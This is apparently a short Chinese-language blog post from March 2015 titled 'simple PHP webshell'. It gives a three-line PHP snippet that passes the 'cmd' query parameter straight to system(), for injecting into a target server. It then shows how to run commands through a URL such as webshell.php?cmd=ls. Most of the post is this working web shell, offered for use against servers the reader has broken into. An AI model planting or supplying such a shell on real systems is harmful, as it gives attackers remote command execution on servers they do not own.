2015年3月23日 星期一

簡易PHP webshell

如果有辦法在目標伺服器中塞入php code的話,只要塞下這段code就能達到簡易webshell的效果:

<?php
     $cmd = $_GET['cmd'];
     system($cmd);
?>

使用方法為http://www.example.com/upload/webshell.php?cmd=ls
(粗體部分可代換成其他指令)

其實這篇沒啥技術含量,只是呼叫一個system function而已XD

沒有留言:

張貼留言